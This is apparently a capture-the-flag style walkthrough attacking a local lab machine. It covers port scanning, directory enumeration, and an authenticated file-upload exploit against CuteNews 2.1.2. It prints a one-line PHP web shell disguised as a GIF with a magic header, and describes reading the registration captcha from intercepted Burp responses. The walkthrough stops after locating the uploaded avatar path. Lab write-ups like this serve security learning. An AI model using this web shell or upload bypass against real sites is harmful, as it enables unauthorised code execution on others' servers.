┌──(kali㉿GNOME)-[~]
└─$ rustscan -a 192.168.160.128
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
110/tcp open pop3 syn-ack
995/tcp open pop3s syn-ack
┌──(kali㉿GNOME)-[~]
└─$ nmap -sC -sV -Pn 192.168.160.128 -p 22,80,88,110,995
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA)
| 256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA)
|_ 256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
88/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: 404 Not Found
110/tcp open pop3 Courier pop3d
|_pop3-capabilities: IMPLEMENTATION(Courier Mail Server) UTF8(USER) USER PIPELINING STLS UIDL TOP LOGIN-DELAY(10)
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: <email:[email protected]>
| Not valid before: 2020-09-17T16:28:06
|_Not valid after: 2021-09-17T16:28:06
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Courier pop3d
|_pop3-capabilities: IMPLEMENTATION(Courier Mail Server) UTF8(USER) TOP PIPELINING UIDL USER LOGIN-DELAY(10)
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: <email:[email protected]>
| Not valid before: 2020-09-17T16:28:06
|_Not valid after: 2021-09-17T16:28:06
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿GNOME)-[~]
└─$ gobuster dir -u <http://192.168.160.128:80/> -w /usr/share/wordlists/dirb/common.txt -q -t 100
/.htpasswd (Status: 403) [Size: 280]
/.htaccess (Status: 403) [Size: 280]
/.hta (Status: 403) [Size: 280]
/core (Status: 301) [Size: 317] [--> <http://192.168.160.128/core/>]
/docs (Status: 301) [Size: 317] [--> <http://192.168.160.128/docs/>]
/favicon.ico (Status: 200) [Size: 1150]
/index.html (Status: 200) [Size: 10701]
/index.php (Status: 200) [Size: 6175]
/libs (Status: 301) [Size: 317] [--> <http://192.168.160.128/libs/>]
/manual (Status: 301) [Size: 319] [--> <http://192.168.160.128/manual/>]
/server-status (Status: 403) [Size: 280]
/skins (Status: 301) [Size: 318] [--> <http://192.168.160.128/skins/>]
/uploads (Status: 301) [Size: 320] [--> <http://192.168.160.128/uploads/>]
There is a login portal at /index.php
As we can see it is CuteNews 2.1.2 after a quick search I got a lot of Metasploit module and other python PoC but none of them works because I do not have the login credentials.
I end up finding medium and I got to this https://musyokaian.medium.com/cutenews-2-1-2-remote-code-execution-vulnerability-450f29673194
Now we craft a simple PHP file to execute system command, and save it as malicious.php
<?php echo system($_GET["cmd"]); ?>
┌──(kali㉿GNOME)-[~/Desktop]
└─$ file malicious.php
malicious.php: PHP script, ASCII text
As we can see, it is a PHP script by default, however, after adding GIF8; to its first line, we will get GIF image instead
┌──(kali㉿GNOME)-[~/Desktop]
└─$ cat malicious.php
GIF8;
<?php echo system($_GET["cmd"]); ?>
┌──(kali㉿GNOME)-[~/Desktop]
└─$ file malicious.php
malicious.php: GIF image data 16188 x 26736
But then when I moved forward to register an account, ending up there is a Captcha which is not similar as the medium blog post!
I tried refresh the Captcha but there is no luck so…. WTF
But after a few try, actually I can get the Captcha by intercepting and and check the response. However, it is not showing up on the front but it actually shows on the Burp Interception so.
Register Successful
Clicking on Personal Options and I get to found this upload tab
Right Click on the Avatar and Open image in new tab will bring us to the file path as the /uploads tab in the gobuster result does not bring us to anything